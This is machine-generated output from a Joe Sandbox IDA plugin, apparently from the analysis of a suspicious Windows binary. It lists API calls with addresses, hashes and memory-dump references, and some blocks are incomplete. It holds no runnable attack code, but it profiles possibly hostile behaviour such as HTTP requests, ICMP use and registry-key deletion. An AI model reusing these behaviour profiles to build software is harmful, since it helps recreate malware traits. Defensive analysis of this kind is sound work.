                                                                                                Similarity
                                                                                                • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                                                                                • String ID:
                                                                                                • API String ID: 3705125965-3916222277
                                                                                                • Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                                                                • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
                                                                                                • Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                                                                • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
                                                                                                APIs
                                                                                                • GetMenuItemInfoW.USER32 ref: 0045FAC4
                                                                                                • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                                                                                                • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Menu$Delete$InfoItem
                                                                                                • String ID: 0
                                                                                                • API String ID: 135850232-4108050209
                                                                                                • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                                                                • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                                                                                                • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                                                                • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
                                                                                                APIs
                                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0045087D
                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$Long
                                                                                                • String ID: SysTreeView32
                                                                                                • API String ID: 847901565-1698111956
                                                                                                • Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                                                                • Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
                                                                                                • Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                                                                • Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
                                                                                                APIs
                                                                                                • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
                                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
                                                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$Window
                                                                                                • String ID: SysMonthCal32
                                                                                                • API String ID: 2326795674-1439706946
                                                                                                • Opcode ID: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                                                                • Instruction ID: 97bf4b40409f6c90460d1384a7672ac630dd7a2161d32aee0dcf483843136ede
                                                                                                • Opcode Fuzzy Hash: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                                                                • Instruction Fuzzy Hash: A93195752002046BDB10DEA9DC85FEB73BDEB9C724F104619FA24A72C1D6B4FC558B64
                                                                                                APIs
                                                                                                • DestroyWindow.USER32(00000000), ref: 00450A2F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: DestroyWindow
                                                                                                • String ID: msctls_updown32
                                                                                                • API String ID: 3375834691-2298589950
                                                                                                • Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                                                                • Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
                                                                                                • Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                                                                • Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: _memmove
                                                                                                • String ID: $<
                                                                                                • API String ID: 4104443479-428540627
                                                                                                • Opcode ID: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                                                                • Instruction ID: e8c4ca86f7ae52158d8313b00b6d431508e51e3fea12eaab667d4a9530e7d8b8
                                                                                                • Opcode Fuzzy Hash: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                                                                • Instruction Fuzzy Hash: A331EF30D04258DEFF25CFAAC9847EEBBB1AF11310F18419AD455A7382D7789E48CB25
                                                                                                APIs
                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                                                                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorMode$DiskFreeSpace
                                                                                                • String ID: \VH
                                                                                                • API String ID: 1682464887-234962358
                                                                                                • Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                                                                • Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
                                                                                                • Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                                                                • Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
                                                                                                APIs
                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                                                                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorMode$DiskFreeSpace
                                                                                                • String ID: \VH
                                                                                                • API String ID: 1682464887-234962358
                                                                                                • Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                                                                • Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
                                                                                                • Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                                                                • Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
                                                                                                APIs
                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
                                                                                                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
                                                                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorMode$DiskFreeSpace
                                                                                                • String ID: \VH
                                                                                                • API String ID: 1682464887-234962358
                                                                                                • Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                                                                • Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
                                                                                                • Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                                                                • Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
                                                                                                APIs
                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
                                                                                                • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
                                                                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorMode$InformationVolume
                                                                                                • String ID: \VH
                                                                                                • API String ID: 2507767853-234962358
                                                                                                • Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                                                                • Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
                                                                                                • Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                                                                • Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
                                                                                                APIs
                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
                                                                                                • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                                                                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorMode$InformationVolume
                                                                                                • String ID: \VH
                                                                                                • API String ID: 2507767853-234962358
APIs
• SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
• SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
• SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
Strings
Similarity
• API ID: MessageSend
• String ID: msctls_trackbar32
• API String ID: 3850602802-1010561917
APIs
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• CLSIDFromString.OLE32(?,00000000), ref: 00435236
• SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
• SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
Strings
Similarity
• API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
• String ID: crts
• API String ID: 943502515-3724388283
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
• SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
• SetErrorMode.KERNEL32(?), ref: 0045D35C
Strings
Similarity
• API ID: ErrorMode$LabelVolume
• String ID: \VH
• API String ID: 2006950084-234962358
APIs
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• GetMenuItemInfoW.USER32 ref: 00449727
• SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
• DrawMenuBar.USER32 ref: 00449761
Strings
Similarity
• API ID: Menu$InfoItem$Draw_malloc
• String ID: 0
• API String ID: 772068139-4108050209
APIs
Strings
Similarity
• API ID: _wcslen$_wcscpy
• String ID: 3, 3, 8, 1
• API String ID: 3469035223-357260408
APIs
• LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
• GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
Strings
Similarity
• API ID: AddressLibraryLoadProc
• String ID: ICMP.DLL$IcmpCloseHandle
• API String ID: 2574300362-3530519716
APIs
• LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
• GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
Strings
Similarity
• API ID: AddressLibraryLoadProc
• String ID: ICMP.DLL$IcmpCreateFile
• API String ID: 2574300362-275556492
APIs
• LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
• GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
Strings
Similarity
• API ID: AddressLibraryLoadProc
• String ID: ICMP.DLL$IcmpSendEcho
• API String ID: 2574300362-58917771
APIs
• LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
• GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                • API String ID: 2574300362-4033151799
                                                                                                • Opcode ID: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                                                                • Instruction ID: e1e112c22781e886f83f7ab60c8bc672304d94c0271b2a691c2b6ddb7eb549cd
                                                                                                • Opcode Fuzzy Hash: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                                                                • Instruction Fuzzy Hash: 3FE0C2B0440315AFCB106F6AD95460B7BD89B14321F10583BF980E2600C7B8E88087B8
                                                                                                APIs
                                                                                                • VariantInit.OLEAUT32(?), ref: 0047950F
                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                                                                                                • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                                                                                                • VariantClear.OLEAUT32(?), ref: 00479650
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Variant$AllocClearCopyInitString
                                                                                                • String ID:
                                                                                                • API String ID: 2808897238-0
                                                                                                • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                                                                • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                                                                                                • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                                                                • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
                                                                                                APIs
                                                                                                • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                                                                                                • __itow.LIBCMT ref: 004699CD
                                                                                                  • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
                                                                                                • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
                                                                                                • __itow.LIBCMT ref: 00469A97
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$__itow
                                                                                                • String ID:
                                                                                                • API String ID: 3379773720-0
                                                                                                • Opcode ID: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                                                                • Instruction ID: c5a9f548720e127460bbd30f9c4a1142764b372a0404ca0a71d180b9b8c9b2b0
                                                                                                • Opcode Fuzzy Hash: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                                                                • Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9
                                                                                                APIs
                                                                                                • GetWindowRect.USER32(?,?), ref: 00449A4A
                                                                                                • ScreenToClient.USER32(?,?), ref: 00449A80
                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$ClientMoveRectScreen
                                                                                                • String ID:
                                                                                                • API String ID: 3880355969-0
                                                                                                • Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                                                                • Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
                                                                                                • Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                                                                • Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
                                                                                                APIs
